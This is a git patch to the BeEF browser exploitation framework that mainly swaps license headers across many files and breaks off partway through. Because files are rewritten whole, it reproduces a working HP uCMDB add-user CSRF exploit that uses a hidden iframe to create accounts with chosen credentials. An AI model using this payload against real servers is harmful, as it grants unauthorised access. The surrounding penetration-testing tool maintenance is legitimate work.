From d2188b230c4a7a6c4a7f298536262f376c5e4f17 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Fri, 2 Nov 2012 15:27:01 +1000 Subject: [PATCH] More changed license headers --- INSTALL.txt | 16 +- README | 158 ++++++++---------- README.mkd | 158 ++++++++---------- core/loader.rb | 15 +- core/main/handlers/modules/command.rb | 14 +- extensions/admin_ui/media/css/base.css | 17 +- extensions/admin_ui/media/css/ext-all.css | 17 +- extensions/admin_ui/media/css/wterm.css | 17 +- extensions/demos/html/butcher/butch.css | 17 +- extensions/notifications/notifications.rb | 15 +- extensions/requester/api/hook.rb | 17 +- extensions/xssrays/api/scan.rb | 16 +- .../hooked_domain/ajax_fingerprint/module.rb | 15 +- .../hp_ucmdb_add_user_csrf/command.js | 73 ++++---- .../hp_ucmdb_add_user_csrf/config.yaml | 40 ++--- .../exploits/hp_ucmdb_add_user_csrf/module.rb | 71 ++++---- modules/host/get_physical_location/command.js | 21 +-- .../host/get_physical_location/config.yaml | 17 +- modules/host/get_physical_location/module.rb | 17 +- modules/host/get_wireless_keys/command.js | 21 +-- modules/host/get_wireless_keys/config.yaml | 17 +- .../persistence/man_in_the_browser/command.js | 19 +-- .../phonegap_check_connection/command.js | 20 +-- .../phonegap_persist_resume/command.js | 19 +-- .../clickjacking/command.js | 19 +-- .../clickjacking/config.yaml | 14 +- .../social_engineering/clickjacking/module.rb | 16 +- 27 files changed, 317 insertions(+), 559 deletions(-) diff --git a/INSTALL.txt b/INSTALL.txt index fcf9719c5..552ccfc6d 100644 --- a/INSTALL.txt +++ b/INSTALL.txt @@ -1,18 +1,8 @@ =============================================================================== - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission =============================================================================== diff --git a/README b/README index cdca66e3c..e91bcb000 100644 --- a/README +++ b/README @@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -Please, send us pull requests! - -Web: http://beefproject.com/ - -Mail: beef-subscribe@bindshell.net - -IRC: ircs://irc.freenode.net/beefproject - -Twitter: @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instrustions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +Please, send us pull requests! + +Web: http://beefproject.com/ + +Mail: beef-subscribe@bindshell.net + +IRC: ircs://irc.freenode.net/beefproject + +Twitter: @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + + +Usage +----- + +To get started, simply execute beef and follow the instrustions: + + $ ./beef + diff --git a/README.mkd b/README.mkd index 272b5ae76..498d190c9 100644 --- a/README.mkd +++ b/README.mkd @@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -__Please, send us pull requests!__ - -__Web:__ http://beefproject.com/ - -__Mail:__ beef-subscribe@bindshell.net - -__IRC:__ ircs://irc.freenode.net/beefproject - -__Twitter:__ @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable - - -Usage ------ - -To get started, simply execute beef and follow the instructions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +__Please, send us pull requests!__ + +__Web:__ http://beefproject.com/ + +__Mail:__ beef-subscribe@bindshell.net + +__IRC:__ ircs://irc.freenode.net/beefproject + +__Twitter:__ @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable + + +Usage +----- + +To get started, simply execute beef and follow the instructions: + + $ ./beef + diff --git a/core/loader.rb b/core/loader.rb index 3ba04c62f..4a947536c 100644 --- a/core/loader.rb +++ b/core/loader.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. # @note Include here all the gems we are using require 'rubygems' diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index d4c97834a..0df1cbdc9 100644 --- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb @@ -51,19 +51,11 @@ module BeEF #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session) #content = command_module.output.gsub('// - #// Copyright 2012 Wade Alcorn wade@bindshell.net #// - #// Licensed under the Apache License, Version 2.0 (the "License"); - #// you may not use this file except in compliance with the License. - #// You may obtain a copy of the License at + #// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + #// Browser Exploitation Framework (BeEF) - http://beefproject.com + #// See the file 'doc/COPYING' for copying permission #// - #// http://www.apache.org/licenses/LICENSE-2.0 - #// - #// Unless required by applicable law or agreed to in writing, software - #// distributed under the License is distributed on an "AS IS" BASIS, - #// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - #// See the License for the specific language governing permissions and - #// limitations under the License. #//', "") ws.send(@output, hooked_browser.session) else diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css index ca32174a6..516acd487 100644 --- a/extensions/admin_ui/media/css/base.css +++ b/extensions/admin_ui/media/css/base.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + #header .right-menu { float: right; margin: 10px; diff --git a/extensions/admin_ui/media/css/ext-all.css b/extensions/admin_ui/media/css/ext-all.css index 7e56a6030..230fbd0ae 100644 --- a/extensions/admin_ui/media/css/ext-all.css +++ b/extensions/admin_ui/media/css/ext-all.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + /*! * Ext JS Library 3.3.1 * Copyright(c) 2006-2010 Sencha Inc. diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css index 064e8cd41..45217e860 100644 --- a/extensions/admin_ui/media/css/wterm.css +++ b/extensions/admin_ui/media/css/wterm.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + /* Basic Terminal CSS */ .wterm_terminal { background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto; } diff --git a/extensions/demos/html/butcher/butch.css b/extensions/demos/html/butcher/butch.css index c5e6b59b4..efb2f7610 100644 --- a/extensions/demos/html/butcher/butch.css +++ b/extensions/demos/html/butcher/butch.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + html { height: 100%; } diff --git a/extensions/notifications/notifications.rb b/extensions/notifications/notifications.rb index b9e5cbb94..6ae72817f 100644 --- a/extensions/notifications/notifications.rb +++ b/extensions/notifications/notifications.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. require 'extensions/notifications/channels/tweet' require 'extensions/notifications/channels/email' diff --git a/extensions/requester/api/hook.rb b/extensions/requester/api/hook.rb index 1faa059b0..f9377d82a 100644 --- a/extensions/requester/api/hook.rb +++ b/extensions/requester/api/hook.rb @@ -3,6 +3,7 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # + module BeEF module Extension module Requester @@ -31,19 +32,9 @@ module BeEF #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path 'beef.net.requester').gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. + // Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + // Browser Exploitation Framework (BeEF) - http://beefproject.com + // See the file \'doc/COPYING\' for copying permission //', "") add_to_body output ws.send(content + @body,hb.session) diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb index 0f4ca3691..ceb0b3374 100644 --- a/extensions/xssrays/api/scan.rb +++ b/extensions/xssrays/api/scan.rb @@ -43,19 +43,9 @@ module BeEF # todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. + // Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + // Browser Exploitation Framework (BeEF) - http://beefproject.com + // See the file \'doc/COPYING\' for copying permission //', "") add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug ws.send(content + @body,hb.session) diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb index 279cccf47..68227c438 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb +++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. class Ajax_fingerprint < BeEF::Core::Command diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js index 5626d880b..d30127f35 100644 --- a/modules/exploits/hp_ucmdb_add_user_csrf/command.js +++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js @@ -1,41 +1,32 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { -var protocol = '<%= @protocol %>'; -var host = '<%= @host %>'; -var port = '<%= @port %>'; -var usertype = '<%= @usertype %>'; -var customerid = '<%= @customerid %>'; -var username = '<%= @username %>'; -var password = '<%= @password %>'; - -var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype; -url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password; - -if (usertype == 'createIntegrationUser'){ - url += '&arg3='; -} - -var ucmdb_iframe = beef.dom.createInvisibleIframe(); -ucmdb_iframe.setAttribute('src', url); - -cleanup = function() { - document.body.removeChild(ucmdb_iframe); -} -setTimeout("cleanup()", 15000); - -beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); -}); +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +beef.execute(function() { +var protocol = '<%= @protocol %>'; +var host = '<%= @host %>'; +var port = '<%= @port %>'; +var usertype = '<%= @usertype %>'; +var customerid = '<%= @customerid %>'; +var username = '<%= @username %>'; +var password = '<%= @password %>'; + +var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype; +url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password; + +if (usertype == 'createIntegrationUser'){ + url += '&arg3='; +} + +var ucmdb_iframe = beef.dom.createInvisibleIframe(); +ucmdb_iframe.setAttribute('src', url); + +cleanup = function() { + document.body.removeChild(ucmdb_iframe); +} +setTimeout("cleanup()", 15000); + +beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); +}); diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml index 4202b6c98..50fc32640 100644 --- a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml +++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml @@ -1,25 +1,15 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - hp_ucmdb_add_user_csrf: - enable: true - category: "Exploits" - name: "HP uCMDB 9.0x add user CSRF" - description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html" - authors: ["Bart Leppens"] - target: - working: ["ALL"] +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + hp_ucmdb_add_user_csrf: + enable: true + category: "Exploits" + name: "HP uCMDB 9.0x add user CSRF" + description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html" + authors: ["Bart Leppens"] + target: + working: ["ALL"] diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb index 3213161a7..9781327d7 100644 --- a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb +++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb @@ -1,40 +1,31 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -class Hp_ucmdb_add_user_csrf < BeEF::Core::Command - - def self.options - return [ - { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore', - 'store_fields' => ['protocol'], 'store_data' => [['http'],['https']], - 'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true - }, - {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, - {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'}, - { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore', - 'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']], - 'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true - }, - {'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'}, - {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'}, - {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - -end +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Hp_ucmdb_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore', + 'store_fields' => ['protocol'], 'store_data' => [['http'],['https']], + 'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true + }, + {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, + {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'}, + { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore', + 'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']], + 'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true + }, + {'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'}, + {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js index 9fb382db4..4047325e3 100755 --- a/modules/host/get_physical_location/command.js +++ b/modules/host/get_physical_location/command.js @@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml index afbb27215..49f7b48b2 100755 --- a/modules/host/get_physical_location/config.yaml +++ b/modules/host/get_physical_location/config.yaml @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_physical_location: diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb index 17f4723fb..7136a52e4 100755 --- a/modules/host/get_physical_location/module.rb +++ b/modules/host/get_physical_location/module.rb @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + require 'rubygems' require 'json' require 'open-uri' diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js index 54aec9505..350d70552 100644 --- a/modules/host/get_wireless_keys/command.js +++ b/modules/host/get_wireless_keys/command.js @@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in 